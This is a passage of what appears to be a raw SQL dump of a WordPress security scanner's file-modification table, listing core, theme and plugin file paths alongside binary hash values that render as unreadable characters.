���������Kl���@\\','',0,'?'),('��ΝH�*��*.ځS','wp-admin/includes/bookmark.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M\0��V�r�K���','��=�)g��E�S�Y�[p�t%�Q���\"�','',0,'?'),('��e��v���\r��','wp-content/themes/hueman/functions/widgets/alx-video.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�T�mԸ�Ꮨ�6��','!2O\Z��~�懱7���[(͏v\'@GT�A�fD�/','',0,'?'),('����\0��+؆����','wp-includes/wp-includes/class-wp-ajax-response.php',0,'o6�)�Q�\"Sσt�.H�','o6�)�Q�\"Sσt�.H�','��[��$���g�nM!^\\���9t�t��>Z�','',0,'?'),('��?�X�%8<?����','wp-content/themes/newsmag/assets/sass/modules/_recent-posts.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','! 3��fR�u�\'i�','V��g7��*��~vi�&�� �� N4�,� 9U','',0,'?'),('��dx���eB�ݙϟ5','wp-includes/IXR/class-IXR-clientmulticall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H���q�g��l�t','��ғ\'bO����E�&ƧW0h� o�\\`��Y��','',0,'?'),('���f�Wl�j�777','wp-content/themes/advance/inc/kirki/assets/scss/tooltips.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?[߸*�mE1��]���','��Q���.!0V��%�����D�-��}��4','',0,'?'),('�ɔ/� yT�5:Dh�','wp-content/plugins/wp-cerber/assets/flags/mn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�{�)YJ����','/ҹ��;9��������\0d�֑�]�>','',0,'?'),('��F��kWM����WHU','wp-content/themes/promote/inc/kirki/assets/css/customizer-dynamic-css-width.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g��8�RR��J���','��}��ڝ���$X����Y�\0%tJ�\'���','',0,'?'),('�ўA��2k�����\\��','wp-content/themes/weblog/acmethemes/hooks/excerpts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;�Q�XZf��h�M','\'��M8(�#ꌒ,�I�� �yj|�R����9�','',0,'?'),('��\rA�s@�Kx?0p','wp-includes/wp-includes/SimplePie/Source.php',0,'a��A:�$]B-�vw�)','a��A:�$]B-�vw�)','�\"���9M�a���U�_�h�I��>�,]�C�','',0,'?'),('��]���\'��.f�7�?','wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-dropdown-pages-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�0����熘y*v�','�s\\�LZ���}�[Z!so{Xl�A��Q���b�','',0,'?'),('��Ul1�ȕD�bmg�','wp-includes/css/buttons-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F��X�WDw����ڭ�','�o� ������!Pc�����\0�i�F9aK����','',0,'?'),('���Ϗ��RCOh����','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/InvalidDatabaseException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0��6��.tz��x�o','��;���p^\0��3�Թ�(� ��A���a���w','',0,'?'),('�\nfv�8���1���-I','wp-includes/SimplePie/Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','逗z�qŔ��/��','_pe�NO�/�*�mv��ȿ�n6*��zo��n�','',0,'?'),('���U�N,� \\1','wp-content/themes/twentynineteen/sass/forms/_forms.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��n����ŋA�','h��VC{�B�{���4O�b�]=��;X)��(X�','',0,'?'),('���F_�o�>ϐ��','wp-content/themes/maxbusiness/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��� Y��=��=k\n�','��$��3�M�}�p�/��b/��oy ��','',0,'?'),('�3�(߄J�D��g���','wp-content/themes/promote/author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1^�@�|Q�!����:','8^\0ɟ����\n�k�FN�x\'��m�\\#\Z�','',0,'?'),('�7���\n�)\0��(yz�','wp-content/themes/hueman/assets/front/img/sidebar/s-right-dual-half-collapse.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���u6_0��b�y\n�{','��}ۆ�Ô5h��T�_\nqz�ψ�2oŞi','',0,'?'),('�F�[��㵋Pѳ�@�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Postal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�b�P\"��x�Y@0��','�\'���n��*2nԋ����)�a(�_�Iq�ɘ{','',0,'?'),('�`�`\'�l`=��X(','wp-content/plugins/wordfence/views/options/option-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����?�@s�ó','aqq�������@.�7T�o=6�\0<��CZ','',0,'?'),('�y��ё�c�j!�\\\'','wp-includes/class-wp-block-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.�״�8��9��','�$-���R̒�~�����N�j��]?=��&','',0,'?'),('�2�D[\"��*\"(��','wp-includes/js/jquery/ui/effect-size.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a;l�@��r%�ݢZ','���cQ>�WYe\Zw\"���`�M�rј^','',0,'?'),('����L���j2�','wp-includes/wp-includes/js/dist/notices.js',0,'m����5��F2�c�:į','m����5��F2�c�:į','�d��P��\'���Z8������ϭd�%9���AN','',0,'?'),('��hJ��D�㰗G� �n','wp-content/plugins/wordfence/lib/wfCentralAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','耳��B/�X�\n`�2r','��>C��]�!��կVMՍ�4U��U����\Z','',0,'?'),('���ZQ4��\\(�܇','wp-admin/network/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϯ\r��&Z3�r�\"�','�:��%�;Ki�W@>�U;������#�>','',0,'?'),('��x��Ϡ��\Z�P�','wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php',0,'�w��ͱ��r0��=�','�w��ͱ��r0��=�','?E�%��+�����w�\r�^�֗.$�i�$[W','',0,'?'),('�˦�����]�ɬ��','wp-includes/wp-includes/js/dist/vendor/lodash.min.js',0,'�:)DnBC���9��','�:)DnBC���9��','�-�1,�O�\"y�I띎�N�WI�#nKk\0:�','',0,'?'),('��[0��^������','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AnonymousIp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�mg�ݜ|�<뼸Dh','�+��%�G�<t�1]�I�5m�\Z�}��E�>�;','',0,'?'),('���cΧ�?5���}w�','wp-includes/wp-includes/js/codemirror/codemirror.min.js',0,'�� �f��h�;f�q�','�� �f��h�;f�q�','�u�*�Q�6�Ƅ�d�vdȇ�_���\0�����','',0,'?'),('��H�\'#�!��N�w�','wp-content/themes/wp-barrister/content-single-people.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������t[���K��','˽�ے?�4���L��t�XΩ�Re�a','',0,'?'),('��Ƞ\">�gݠ���','wp-content/themes/twentytwentyone/assets/css/custom-color-overrides.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�*�;��8I�w�\ZA�','�st4�ݎ%�o�@L��I�ߟ�u�\Z�\\o�8�D','',0,'?'),('��/�؊!�N>�\n�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f<_2S^I��Z','��iݯ��8{��i���q!d���Ս��Az�','',0,'?'),('��N�F�}��Pn�KGK�','wp-content/themes/hueman/assets/front/img/demo/4-160x160.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�@��Z��VՑK�\r','�O����N�2Z5#�55~U��d�a��M\'\'<','',0,'?'),('�\'}j��=A>\r���9','wp-content/plugins/wp-cerber/assets/flags/vi.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�.f���&� S��j','����)Am{���M�D�&��ʑaG\rmM�f','',0,'?'),('�2��(c�?z➀�b','wp-content/themes/sg-window/inc/css/button.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���.�q�gS����','�N����p4�}��O�oL��O��','',0,'?'),('�\Z[�p6�@4{��B','wp-content/themes/newsmag/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6��]�ٝA+y�R�','�\n��4r�7�iL��ؠ̹i;�gvW�O�mJ1','',0,'?'),('�!�VTg�\"O\r�.�2L','wp-content/plugins/wp-cerber/assets/flags/pn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����E~&X��l�x','g���\'G��5�ɒ<�tȺyol���|U�ӫ','',0,'?'),('�\Z���l���3Ȋ�','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�UՒ�JL��m8`v','ӛ�vQ��k��\n��l�]�`Ε��۷�+}�kO�','',0,'?'),('���h#^��J !�ߍ','wp-content/themes/spidermag/spidermag/customizer/header-section/header-pannel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�1���E�\\:��','p����*�%�n,d�\\�=p��y�4�','',0,'?'),('�5?���qlD���D��','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a͐��\r����','u�^K���\n���ih��C�d.i�H�-��j�l�','',0,'?'),('�J|6}�P�,\rٛ','wp-admin/css/colors/_admin.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R)���8 <�67�#\Z�','��]>y-�f�\"�Ny%\r�l��r`������','',0,'?'),('�TD�{�i�˳֓��*�','wp-content/themes/advance/inc/kirki/assets/scss/controls/color-palette.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dY ږ�`���s#P','�e��7n�!� f��D\Zh\'�J6SJo�1�','',0,'?'),('�U�~\n�SM:�r�� �D','wp-includes/wp-includes/sodium_compat/src/Core32/XSalsa20.php',0,'�\\������:R/�+','�\\������:R/�+','�ɫ�������:���jN�mm����R���[','',0,'?'),('�W�������6���s','wp-content/themes/showcase-lite/css/responsive.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F0��k��Uj�(l$','/�gU۹��c$�W�β���n�]��q-�','',0,'?'),('�Z�@����E�ya�B','wp-content/themes/twentynineteen/sass/typography/_headings.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|R��s�x���*%�','�pЎ��(�W�\\��� �c�36�\0��\'�f�','',0,'?'),('�\\O�hq��2���.�','wp-content/plugins/wp-cerber/assets/admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J��`���.��/','���>6Q�n��7���2�Sۈ܊�� �','',0,'?'),('�d`#)?�ϳ��0(w��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �oY���-�)EHd','l�,8�E�T��C�eyl�a�S��;)\'\"d�`z��','',0,'?'),('�g��\ZʻИJ��m{','wp-includes/wp-includes/ID3/getid3.php',0,'�!N\0�[�5�իk@0','�!N\0�[�5�իk@0','B�#����L�fW������>2�nT����','',0,'?'),('�j���\\�غ��&','wp-includes/wp-includes/class-wp-query.php',0,'\'\'\'��UQ�|4��','\'\'\'��UQ�|4��','F�7��������S�1�\Z�`#�4�\rHsL\n','',0,'?'),('�qOF����G�P*�','wp-includes/wp-includes/js/jquery/ui/effect-slide.js',0,'��a�d��{2װ�','��a�d��{2װ�','T�f��b������>�s;X<`0��<9��:�','',0,'?'),('�v���]ʓg�[<�ͻ�','wp-content/themes/advance/js/advance-preloder.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','왑�e{ED�7;#','���-}��z��!>�-h �f�-K�\"d+�','',0,'?'),('����Cs1���j','wp-content/themes/Yegor/search.php',0,'��z�jS[�T��-','��z�jS[�T��-','.N4Ӛ\\\0�?|�o����C�FX;K �}','',0,'?'),('��x�`�f,5ef2��','wp-admin/js/site-health.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T%��dx�P7��/�','����{���]�[mX1!u������n�2f�','',0,'?'),('�����[��:�����q','wp-admin/includes/class-wp-plugins-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]5�g��-M���','��?`:3bO���Y�.��*��/��u��Pb_�','',0,'?'),('����7y�����','wp-content/themes/hueman/page-templates/child-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���m����oۼ��\r','z.ڷ`���w��\"|�ȅ��R,`��~�s��;','',0,'?'),('�������\0+��A�.\\','wp-content/plugins/wp-cerber/assets/flags/qa.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z���%4o�m)�|$I','F��{tT��$(��lVq�5��O�*g','',0,'?'),('��@����c�#�/��>','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-dropdown-pages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n�� .*�XI��','{Yw�B��S�g�m9��2���,��|�D��aq�','',0,'?'),('���P�Of;���/��','wp-includes/SimplePie/Decode/HTML/Entities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��jыp&y������U','��WP��*P=Nϻ;\Z���i��8��2�_��� ','',0,'?'),('��MGypQ�M/g�!�','wp-includes/wp-includes/js/jquery/ui/sortable.js',0,'�kX���E�EL�&�','�kX���E�EL�&�','F\0|\'��Lk8qp� �(����� v�}/5N![','',0,'?'),('��.yz�_��jz�|�','wp-content/themes/twentynineteen/images/pattern_03.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�Y)f�x��:.+��','4]ou�\'�u�����mN��ZV;Ke��jW>T','',0,'?'),('���h2���\n\\�V','wp-content/themes/kidzoo-lite/sass/kidzoo.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�yM�N���bb�qk�5','�_�d���t(�ƅȠp�o�~\"\' @}��v���','',0,'?'),('��켮Aq=��l,����','wp-content/themes/sg-window/css/scheme-2.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��E�Y�\\yD�>�g�','ac5j����}�@5��2�l�r+��\n��#','',0,'?'),('���\n(q���?�}v','wp-includes/wp-includes/feed-rss2-comments.php',0,'L��6<�v�z�L','L��6<�v�z�L','�3۸�kH��?�1B�g#~<X��gbe�','',0,'?'),('��ӑ�?���=�','wp-includes/block-patterns/heading-paragraph.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����?z�I�����E','�i�,��m�O���#�?Vb�,�C-ܢcž\Zh�','',0,'?'),('����dZ��y�_�','wp-content/themes/kidzoo-lite/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c��ś��3X�Xj�q��','��\Z��Y�!lk���31�o�D�3��f��','',0,'?'),('��>�7��\n�a��wc','wp-includes/wp-includes/blocks/list/block.json',0,'��y��b�엽+����','��y��b�엽+����','C��8߿����D��%��6.�E�.;�.� �ח','',0,'?'),('��E��o���Zn�D��','wp-content/themes/hueman/assets/front/img/header/california-280.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����gM�J·h6\Z','a��w7��s��\0��K~�p�D~-9��a��','',0,'?'),('��Z��(���|��Z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QU�p~ocÊ4�Nt��','�L��n�l2@ΐ�>h�i,uJY�H��\\�L�,�B','',0,'?'),('�┬�E��+,����','wp-content/plugins/wp-cerber/jetflow.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U���5����� ��g','�\'e^Ƈ/�G�Ow��=|��_(ӋgW���A','',0,'?'),('�� .c=����� \0','wp-content/themes/spidermag/assets/library/html5shiv/html5shiv.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';@߂�j��Z��}Cڊ�','��yk�kV���0���+��k.�e|��_/]�G','',0,'?'),('��\\ ��Iѻ���,','wp-includes/class-simplepie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��\\��Jġ�љ�','�8l�n-� �o�=��8,;h�\'LFR#�ʜB','',0,'?'),('�����[ia3\\\r�_�p','wp-content/themes/Endolf/FT/plugin/options-framework/js/options-custom.js',0,'=�u�v����\nd��','=�u�v����\nd��','/���!���w�+�Č cc\\�֎8�a0J�P<D','',0,'?'),('���ZNߨ�@��U','wp-includes/wp-includes/certificates/ca-bundle.crt',0,'����M��T�[чB��','����M��T�[чB��','�����aP����P\0�v?6,�̟An���','',0,'?'),('���\\�]^�T�ꥊ�','wp-includes/js/dist/vendor/wp-polyfill-url.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rt\0X��d�xR`��','��b�ՔW�?��gtRċ\\}�D�E�TӇ��=','',0,'?'),('�T���H�<&Jv�eӤ','wp-includes/wp-includes/feed-rdf.php',0,'xG�7�%���\0b���','xG�7�%���\0b���','p=m=G�l�h�nh��V��]�-�+�1�a','',0,'?'),('�\"A\Z�3�<�ll�*]','wp-content/themes/storeone/images/slide2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O���x�0��+���','AC�M\"�c[�{�\'�#��N�r�O~����s','',0,'?'),('�$=Z��Z�Hɼ���f','wp-content/themes/twentytwentyone/assets/sass/06-components/navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������;Y�lE�','�_��E>���@��[)�$�=�A�L� C�Mp�','',0,'?'),('�$lv��EC۩bN','wp-content/themes/twentytwenty/template-parts/footer-menus-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WC��B����I�mU','���z�jy�I���`F�����.\rCC!qc_','',0,'?'),('�/&����2�ѡ\rgDs','wp-includes/http.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-��X㑩��/��2','? *�~HxJF�z����h�mp�ǖ}����','',0,'?'),('�5قaܨϘ� #��bu','wp-includes/js/dist/compose.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��ez�Ua4�U�0#','M\0�Xʠ�m !k����N0Q���YHF���Sda','',0,'?'),('�?q�Hl��(�2�m','wp-content/plugins/wp-cerber/assets/flags/pg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;[����*��','��9O#���x�_���v ��~�%W\Z���','',0,'?'),('�K�J\n�\"�ڻ�<a','wp-includes/wp-includes/blocks/social-link.php',0,'0,}J\"��N������','0,}J\"��N������','�ޝ�+-%]����ٲ�d�)�_�v?O�(�Y\'\\','',0,'?'),('�^长AN�)wQL�փ','wp-content/themes/hueman/assets/czr/css/img/jquery.fs.selecter-arrow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+\nT{� �S^�y�=','u#�b�l ]�#B��dN�\n\Z�;�vJ�\0�','',0,'?'),('�b�E��3�g\'cZ (��','wp-content/plugins/akismet/views/get.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ӵ��q��\'7��\0�Y>�','���x����[�%�����@��c����','',0,'?'),('�j@ٌIt�̿P@\"�^v','wp-content/themes/travel-stories/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,(#�C]�9� �5�','��$���`*�a��Z�p4�>�&,��]�','',0,'?'),('�se������(d*G�}','wp-includes/wp-includes/functions.php',0,'�.���$[L�$�۫�','�.���$[L�$�۫�','sF���z ��v�j���*� Q��w�0�ov','',0,'?'),('�z�s��w�K����S�','wp-includes/wp-includes/feed-rss2.php',0,'��lN+�5 ��O?','��lN+�5 ��O?','�@!�`C��*Me��z�j@ �@���L�jw�','',0,'?'),('�}�u�O�ҭ��G\'','wp-content/themes/gambit/inc/customizer/sections/customizer-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���gBn��z��E','Ra%�I��1S��?Dg�倢�ŏ� Rj','',0,'?'),('��\'� T�a��ɪ��w','wp-content/themes/Yegor/js/mobilemenu.js',0,'kI�~�9f�e2tց','kI�~�9f�e2tց','4�����U�N�����v�5?��[��� ��m��','',0,'?'),('�����r��~��\Z','wp-content/plugins/wp-cerber/assets/flags/ws.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2���Mr�Z�Yܑz�r','$�!�9��d9��8E�\".0�����J��K`','',0,'?'),('����=��Ѷ�8$�','wp-includes/js/dist/vendor/wp-polyfill-node-contains.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���w��%[U��3�','Et������z��fD:x?���o��c�ڋ 8P','',0,'?'),('��?�0|��5uơ��','wp-admin/custom-background.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','㽫��]0�m7��d','Z�5\"=�\0�T�σqr�/0��Q�X^dn6','',0,'?'),('��N�v�E�Q����4�','wp-content/themes/advance/inc/kirki/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Il�1є��?�','�|XC��U�,.���\n����]+M (K�u�c�','',0,'?'),('���qh�n�J�j�','wp-admin/css/nav-menus.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�۶8��BZ�y��-',']�~*%6�r�+�q�.a�V�s!���Ysk����','',0,'?'),('���<� �f%�n�O�','wp-admin/includes/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';b�`u����h\'���y','��Z�C��#�9�8H����<��h�,d��2','',0,'?'),('�ÏuL�,�&Ǒ�\r1','wp-admin/media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�6���U��3','�D�K���3�́uB!@oP��b��#���~','',0,'?'),('���ꌰ;�A��D','wp-includes/wp-includes/js/customize-preview-widgets.js',0,'y�}�����x��c�&�','y�}�����x��c�&�','������(]P���UP\'L��2��n�\Z�\n���','',0,'?'),('�Ӏ9[�M-g��','wp-includes/js/dist/hooks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�|\\&��A�2�','�s��13���������.ˈ��i','',0,'?'),('��%I���}�P�zW��','wp-includes/random_compat/random_bytes_mcrypt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T�Ԧʙ`�P��L','�b=�-.���X�����T���Yn���P��','',0,'?'),('��TS�BAs�Q��H���','wp-content/themes/promote/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N��=��ܷ��3�.','�#]yg��YrU7�xt�\"�[����XZYi�#=','',0,'?'),('��-��\n;�<�)�\Z','wp-includes/wp-includes/js/plupload/moxie.js',0,'�#C\r��5DZ�ǒ����','�#C\r��5DZ�ǒ����','����I�9_/x�t5���(�.g�tT\Z}&���','',0,'?'),('���`����Gl�йE','wp-includes/wp-includes/js/jquery/ui/effect-fade.js',0,'�rs�J��7O,��','�rs�J��7O,��','O#W�V�}��+<������Ϭ>!�����','',0,'?'),('��T��\rYt`] 2��','wp-content/themes/showcase-lite/images/slide-nav.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q\"k��n�\n�w-�q�*','f]e�8�\'����/�n�N�~jY�unAfY�!^��','',0,'?'),('��+M�%��]�sD00�','wp-includes/blocks/freeform/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�oU���ޘx)���\Z�','��Ee��d�._=���r�hQ�]!�+�M<�8','',0,'?'),('�\n��n�=�^�n�N','wp-content/themes/twentytwenty/classes/class-twentytwenty-separator-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:L��?�m&�','8uv��ߜ����_�0-��锴U�2','',0,'?'),('�(dwI\0:\r��Xx1DC','wp-content/plugins/wordfence/views/scanner/issue-control-hide-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��r�`3�U�$�n��','���B:���BA��xd]��Y�<#�p��8u','',0,'?'),('�/�����3�J�','wp-includes/wp-includes/js/wp-auth-check.min.js',0,'*�L�A��`�2ڴ�Hd','*�L�A��`�2ڴ�Hd','O���f����s����0B��9��Z_��2','',0,'?'),('�3�,���cv�k���','wp-content/plugins/wordfence/views/onboarding/overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��iŮ�9�e`��2�','Z���M�GXL;$xMi|Q�%���ŽY2��$_','',0,'?'),('�L�O�:\n�\\c!��','wp-content/themes/maxbusiness/js/html5shiv.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{zN:!�aԉю� �\0','�(��B5s�TP���<pt%�FI4�L�RZ_��Y','',0,'?'),('�WM��{h���(��','wp-content/plugins/wordfence/lib/menu_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�����e�ډT�a��','\nS��x�B�[��)ɩL�6ۖ>���Hϫܥ��','',0,'?'),('�Y��/<��k�@H�U','wp-includes/wp-includes/css/dist/block-editor/style.css',0,'�Ţ% \Z�@1<��L��','�Ţ% \Z�@1<��L��','Z]��5�㮊���c-N�|Wr��*#�H�U=E','',0,'?'),('�`�:f3q�\'\\�Dݙ��','wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-radio-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=2i�(\n��Tp��','�\\���j��y?�dq�=+@�嚼<���','',0,'?'),('�a�@o��\'��kb��','wp-includes/js/jquery/jquery-migrate.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y��k~�x�$K^-3�}','��P�y���D\\\\�cd�~��P���`7 �F/','',0,'?'),('�q���?�)v�^MV�','wp-includes/wp-includes/js/media-models.js',0,'�wɊ��Ur���c[2','�wɊ��Ur���c[2','�Q�疁�n�s;�;��Z�<☱4K;~{','',0,'?'),('�qâ�h���/� �','wp-content/themes/newsmag/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z2D�ku���g467�','�J��4��(K��m�˸�YLQm>g\r�~3�','',0,'?'),('��i/�pEt�\n�l�','wp-content/plugins/wordfence/lib/rest-api/wfRESTScanController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r���0mb74$','�{h��D��X�^�w���6D�fc�@Q��\r�f','',0,'?'),('����2��?!�u�܆\"','wp-content/plugins/wordfence/modules/login-security/views/options/option-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[(AɊ�����h�','����ͳߘ�Q6̨!*���X�x��MM�u@','',0,'?'),('���Kr0V#Z�x&�`�','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z��l~O)1��<�(','�[ɇ� �\0[+K��rJ�]��O�r1qM�\"�','',0,'?'),('���~#�> �g�kU�6','wp-content/themes/hueman/assets/front/img/header/bridge.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�v�Y\n�h�ɝ�-N{','HVB���q7c�B�(��Sh�X`O�Q�K`��','',0,'?'),('����^[X��i� �','wp-admin/themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F���-G;:y^\Z)�','����F�ȳ۬�2U����-��:�1��','',0,'?'),('��:�X��@\0{*�֯�','wp-admin/includes/class-language-pack-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��H�� lO J\rN','�m���%�n\r��؛��qi���m���V&W','',0,'?'),('��4T�(�\\9\'��3�)','wp-admin/css/customize-widgets-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�{����` .�','����=FL�e���c���^&��\Z|\nl��aO�','',0,'?'),('���\0n:T�q}K �@','wp-includes/Requests/Exception/HTTP/408.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@>1d�IX�O��ȷv�','�q���*�lmKңk�\"�M�Q?�p���a�4','',0,'?'),('��k{��&��x\n��','wp-includes/class-wp-error.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l� &�0?&�c~��','G�bM[G&Jr�F�E����1�r�s�L,t�(�W','',0,'?'),('��$�o��1�T�2]l','wp-content/plugins/wordfence/lib/dashboard/widget_countries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�zTc�I��J��W3','�zU)��i��YQ�;�PXꘞL�v�������','',0,'?'),('���A0f��f`� Kǁ}','wp-content/plugins/wordfence/lib/wfDirectoryIterator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n+Z/_��\Zxu��v','��u���;IV��a[�~㵭�TZ\\^�yJ��j','',0,'?'),('��H:�R�p\\H���','wp-content/themes/promote/inc/kirki/assets/js/controls/repeater.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ķ��\ZqCე+R��','��l��b����v�����mU�?UE(YfD�� 